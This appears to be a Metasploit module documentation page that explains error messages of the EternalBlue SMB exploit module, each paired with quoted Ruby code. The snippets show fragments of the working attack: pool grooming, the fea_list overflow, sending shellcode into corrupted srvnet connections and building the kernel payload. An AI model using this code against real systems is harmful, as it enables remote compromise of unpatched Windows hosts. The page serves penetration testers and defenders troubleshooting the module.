bad response status for nx: <RECV_PKT.STATUS_CODE.VALUE>


Here is a relevant code snippet related to the "bad response status for nx: <RECV_PKT.STATUS_CODE.VALUE>" error message:

668:	    send_trans2_second(conn, tree.id, pid, fea_list[progress, fea_list.length], progress)
669:	    recv_pkt = RubySMB::SMB1::Packet::Trans2::Response.read(conn.recv_packet)
670:	    if recv_pkt.status_code.value == 0xc000000d
671:	      print_good('good response status for nx: INVALID_PARAMETER')
672:	    else
673:	      print_error("bad response status for nx: #{recv_pkt.status_code.value}")
674:	    end
675:	
676:	    # one of srvnet_conn struct header should be modified
677:	    # a corrupted buffer will write recv data in designed memory address
678:	    srvnet_conn.each { |sk| sk.send(fake_recv_struct + shellcode, 0) }

Shellcode too long. The place that this exploit put a shellcode is limited to <MAX_SHELLCODE_SIZE> bytes.


Here is a relevant code snippet related to the "Shellcode too long. The place that this exploit put a shellcode is limited to <MAX_SHELLCODE_SIZE> bytes." error message:

721:	    smbpass = datastore.keys.include?('SMBPass') ? datastore['SMBPass'] : ''
722:	
723:	    sc = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
724:	
725:	    if sc.length > MAX_SHELLCODE_SIZE
726:	      print_error("Shellcode too long. The place that this exploit put a shellcode is limited to #{MAX_SHELLCODE_SIZE} bytes.")
727:	      return
728:	    end
729:	
730:	    fea_list = create_fea_list(sc.length)
731:	

Exploit failed with the following error: <E.MESSAGE>


Here is a relevant code snippet related to the "Exploit failed with the following error: <E.MESSAGE>" error message:

733:	    print_status("numGroomConn: #{num_groom_conn}")
734:	
735:	    begin
736:	      _exploit(fea_list, sc, num_groom_conn, smbuser, smbpass)
737:	    rescue StandardError => e
738:	      print_error("Exploit failed with the following error: #{e.message}")
739:	      elog('Error encountered with eternalblue_win8', error: e)
740:	      return false
741:	    end
742:	  end
743:	

Error encountered with eternalblue_win8


Here is a relevant code snippet related to the "Error encountered with eternalblue_win8" error message:

734:	
735:	    begin
736:	      _exploit(fea_list, sc, num_groom_conn, smbuser, smbpass)
737:	    rescue StandardError => e
738:	      print_error("Exploit failed with the following error: #{e.message}")
739:	      elog('Error encountered with eternalblue_win8', error: e)
740:	      return false
741:	    end
742:	  end
743:	
744:	  def create_session_alloc_non_paged(size, username, password, pid)

SMB1 session setup allocate nonpaged pool failed: <RECV_PKT.STATUS_CODE.NAME>n<RECV_PKT.STATUS_CODE.DESCRIPTION>


Here is a relevant code snippet related to the "SMB1 session setup allocate nonpaged pool failed: <RECV_PKT.STATUS_CODE.NAME>n<RECV_PKT.STATUS_CODE.DESCRIPTION>" error message:

827:	        return client, sock
828:	      end
829:	      client.disconnect!
830:	    end
831:	
832:	    print_error("SMB1 session setup allocate nonpaged pool failed: #{recv_pkt.status_code.name}\n#{recv_pkt.status_code.description}")
833:	    return nil
834:	  end
835:	
836:	  def generate_fea_list_nx
837:	    # fea_list for disabling NX is possible because we just want to change only MDL.MappedSystemVa

=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Here is a relevant code snippet related to the "=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=" error message:

1144:	          print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
1145:	          print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
1146:	          break
1147:	        else
1148:	          print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
1149:	          print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
1150:	          print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
1151:	        end
1152:	      end
1153:	    rescue EternalBlueError => e
1154:	      print_error(e.message.to_s)

SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.


Here is a relevant code snippet related to the "SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds." error message:

1152:	      end
1153:	    rescue EternalBlueError => e
1154:	      print_error(e.message.to_s)
1155:	      return false
1156:	    rescue ::RubySMB::Error::NegotiationFailure
1157:	      print_error('SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.')
1158:	      return false
1159:	    rescue ::RubySMB::Error::UnexpectedStatusCode,
1160:	           ::Errno::ECONNRESET,
1161:	           ::Rex::HostUnreachable,
1162:	           ::Rex::ConnectionTimeout,

Could not make SMBv1 connection


Here is a relevant code snippet related to the "Could not make SMBv1 connection" error message:

1183:	      # Step 1: Connect to IPC$ share
1184:	      print_status('Connecting to target for exploitation.')
1185:	      client, tree, sock, os = smb1_anonymous_connect_ipc
1186:	    rescue RubySMB::Error::CommunicationError
1187:	      # Error handler in case SMBv1 disabled on target
1188:	      raise EternalBlueError, 'Could not make SMBv1 connection'
1189:	    else
1190:	      print_good('Connection established for exploitation.')
1191:	
1192:	      if verify_target(os)
1193:	        print_good('Target OS selected valid for OS indicated by SMB reply')

Target OS selected not valid for OS indicated by SMB reply


Here is a relevant code snippet related to the "Target OS selected not valid for OS indicated by SMB reply" error message:

1190:	      print_good('Connection established for exploitation.')
1191:	
1192:	      if verify_target(os)
1193:	        print_good('Target OS selected valid for OS indicated by SMB reply')
1194:	      else
1195:	        print_warning('Target OS selected not valid for OS indicated by SMB reply')
1196:	        print_warning('Disable VerifyTarget option to proceed manually...')
1197:	        raise EternalBlueError, 'Unable to continue with improper OS Target.'
1198:	      end
1199:	
1200:	      # cool buffer print no matter what, will be helpful when people post debug issues

Disable VerifyTarget option to proceed manually...


Here is a relevant code snippet related to the "Disable VerifyTarget option to proceed manually..." error message:

1191:	
1192:	      if verify_target(os)
1193:	        print_good('Target OS selected valid for OS indicated by SMB reply')
1194:	      else
1195:	        print_warning('Target OS selected not valid for OS indicated by SMB reply')
1196:	        print_warning('Disable VerifyTarget option to proceed manually...')
1197:	        raise EternalBlueError, 'Unable to continue with improper OS Target.'
1198:	      end
1199:	
1200:	      # cool buffer print no matter what, will be helpful when people post debug issues
1201:	      print_core_buffer(os)

Unable to continue with improper OS Target.


Here is a relevant code snippet related to the "Unable to continue with improper OS Target." error message:

1192:	      if verify_target(os)
1193:	        print_good('Target OS selected valid for OS indicated by SMB reply')
1194:	      else
1195:	        print_warning('Target OS selected not valid for OS indicated by SMB reply')
1196:	        print_warning('Disable VerifyTarget option to proceed manually...')
1197:	        raise EternalBlueError, 'Unable to continue with improper OS Target.'
1198:	      end
1199:	
1200:	      # cool buffer print no matter what, will be helpful when people post debug issues
1201:	      print_core_buffer(os)
1202:	

Target arch selected not valid for arch indicated by DCE/RPC reply


Here is a relevant code snippet related to the "Target arch selected not valid for arch indicated by DCE/RPC reply" error message:

1201:	      print_core_buffer(os)
1202:	
1203:	      if verify_arch
1204:	        print_good('Target arch selected valid for arch indicated by DCE/RPC reply')
1205:	      else
1206:	        print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')
1207:	        print_warning('Disable VerifyArch option to proceed manually...')
1208:	        raise EternalBlueError, 'Unable to continue with improper OS Arch.'
1209:	      end
1210:	
1211:	      print_status("Trying exploit with #{grooms} Groom Allocations.")

Disable VerifyArch option to proceed manually...


Here is a relevant code snippet related to the "Disable VerifyArch option to proceed manually..." error message:

1202:	
1203:	      if verify_arch
1204:	        print_good('Target arch selected valid for arch indicated by DCE/RPC reply')
1205:	      else
1206:	        print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')
1207:	        print_warning('Disable VerifyArch option to proceed manually...')
1208:	        raise EternalBlueError, 'Unable to continue with improper OS Arch.'
1209:	      end
1210:	
1211:	      print_status("Trying exploit with #{grooms} Groom Allocations.")
1212:	

Unable to continue with improper OS Arch.


Here is a relevant code snippet related to the "Unable to continue with improper OS Arch." error message:

1203:	      if verify_arch
1204:	        print_good('Target arch selected valid for arch indicated by DCE/RPC reply')
1205:	      else
1206:	        print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')
1207:	        print_warning('Disable VerifyArch option to proceed manually...')
1208:	        raise EternalBlueError, 'Unable to continue with improper OS Arch.'
1209:	      end
1210:	
1211:	      print_status("Trying exploit with #{grooms} Groom Allocations.")
1212:	
1213:	      # Step 2: Create a large SMB1 buffer

Did not receive a response from exploit packet


Here is a relevant code snippet related to the "Did not receive a response from exploit packet" error message:

1242:	      print_status('Receiving response from exploit packet')
1243:	      code, _raw = smb1_get_response(sock)
1244:	
1245:	      code_str = '0x' + code.to_i.to_s(16).upcase
1246:	      if code.nil?
1247:	        print_error('Did not receive a response from exploit packet')
1248:	      elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)
1249:	        print_good("ETERNALBLUE overwrite completed successfully (#{code_str})!")
1250:	      else
1251:	        print_warning("ETERNALBLUE overwrite returned unexpected status code (#{code_str})!")
1252:	      end

ETERNALBLUE overwrite returned unexpected status code (<CODE_STR>)!


Here is a relevant code snippet related to the "ETERNALBLUE overwrite returned unexpected status code (<CODE_STR>)!" error message:

1246:	      if code.nil?
1247:	        print_error('Did not receive a response from exploit packet')
1248:	      elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)
1249:	        print_good("ETERNALBLUE overwrite completed successfully (#{code_str})!")
1250:	      else
1251:	        print_warning("ETERNALBLUE overwrite returned unexpected status code (#{code_str})!")
1252:	      end
1253:	
1254:	      # Step 4: Send the payload
1255:	      print_status('Sending egg to corrupted connection.')
1256:	

Target arch is <TARGET_ARCH.FIRST>, but server returned <ARCH.INSPECT>


Here is a relevant code snippet related to the "Target arch is <TARGET_ARCH.FIRST>, but server returned <ARCH.INSPECT>" error message:

1292:	    # XXX: This sends a new DCE/RPC packet
1293:	    arch = dcerpc_getarch
1294:	
1295:	    return true if arch && arch == target_arch.first
1296:	
1297:	    print_warning("Target arch is #{target_arch.first}, but server returned #{arch.inspect}")
1298:	    print_warning('The DCE/RPC service or probe may be blocked') if arch.nil?
1299:	    false
1300:	  end
1301:	
1302:	  def print_core_buffer(os)

The DCE/RPC service or probe may be blocked


Here is a relevant code snippet related to the "The DCE/RPC service or probe may be blocked" error message:

1293:	    arch = dcerpc_getarch
1294:	
1295:	    return true if arch && arch == target_arch.first
1296:	
1297:	    print_warning("Target arch is #{target_arch.first}, but server returned #{arch.inspect}")
1298:	    print_warning('The DCE/RPC service or probe may be blocked') if arch.nil?
1299:	    false
1300:	  end
1301:	
1302:	  def print_core_buffer(os)
1303:	    print_status("CORE raw buffer dump (#{os.length} bytes)")

Error with login: <RESPONSE_CODE>


Here is a relevant code snippet related to the "Error with login: <RESPONSE_CODE>" error message:

1327:	    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)
1328:	    client.pid = nil
1329:	    response_code = client.login
1330:	
1331:	    unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
1332:	      raise RubySMB::Error::UnexpectedStatusCode, "Error with login: #{response_code}"
1333:	    end
1334:	
1335:	    os = client.peer_native_os
1336:	
1337:	    tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")

No response back from SMB echo request. Continuing anyway...


Here is a relevant code snippet related to the "No response back from SMB echo request. Continuing anyway..." error message:

1358:	    sock.put(trans2_pkt_nulled)
1359:	
1360:	    begin
1361:	      sock.get_once
1362:	    rescue EOFError
1363:	      vprint_error('No response back from SMB echo request.  Continuing anyway...')
1364:	    end
1365:	
1366:	    client.echo(count: 1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
1367:	  end
1368:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.